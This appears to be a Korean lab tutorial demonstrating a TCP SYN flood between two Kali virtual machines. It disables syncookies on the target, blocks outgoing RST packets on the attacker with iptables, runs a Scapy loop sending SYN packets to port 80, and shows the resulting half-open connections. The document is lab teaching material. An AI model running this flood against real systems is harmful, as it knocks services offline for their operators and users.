TCP SYN Flooding

TCP SYN Flooding

SYN 패킷을 계속해서 전달

 

Kali#1에 syncookies를 사용을 해지

root@kali:~# sysctl -a | grep syncookies
net.ipv4.tcp_syncookies = 1 ⇐ syncookies를 사용 = SYN Backlog Que가 가득찰 경우 syncookie를 이용
sysctl: reading key "net.ipv6.conf.all.stable_secret"
sysctl: reading key "net.ipv6.conf.default.stable_secret"
sysctl: reading key "net.ipv6.conf.eth0.stable_secret"
sysctl: reading key "net.ipv6.conf.lo.stable_secret"

root@kali:~# sysctl -w net.ipv4.tcp_syncookies=0 ⇐ 원활한 실습을 위해서 syncookies 사용을 해지
net.ipv4.tcp_syncookies = 0

root@kali:~# sysctl -w root@kali:~# sysctl -a | grep syncookies
net.ipv4.tcp_syncookies = 0
sysctl: reading key "net.ipv6.conf.all.stable_secret"
sysctl: reading key "net.ipv6.conf.default.stable_secret"
sysctl: reading key "net.ipv6.conf.eth0.stable_secret"
sysctl: reading key "net.ipv6.conf.lo.stable_secret"

 

Kali#2에서 RST 패킷이 외부로 나가지 못 하도록 방화벽에 등록

root@kali:~# iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

 

Kali#2 방화벽 정책 확인

root@kali:~# iptables -L -n 
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp flags:0x04/0x04

 

Kali#2에서 SYN flooding 공격

>>> ip = IP()
>>> ip.dst= "192.168.111.130"
>>> tcp = TCP()
>>> tcp.dport = 80
>>> tcp.sport = RandNum(1024,65535)
>>> tcp.flags = "S"
>>> syn = ip/tcp
>>> send(syn, loop=True)

 

Kali#1에서 공격 확인

root@kali:~# netstat -an | grep -i syn_recv
tcp6       0      0 192.168.111.130:80      192.168.111.131:31498   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:13962   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:58815   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:62506   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:60498   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:57556   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:19512   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:38476   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:50493   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:20851   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:20618   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:59819   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:58459   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:36364   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:15042   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:49831   SYN_RECV   
tcp6       0      0 192.168.111.130:80      192.168.111.131:18564   SYN_RECV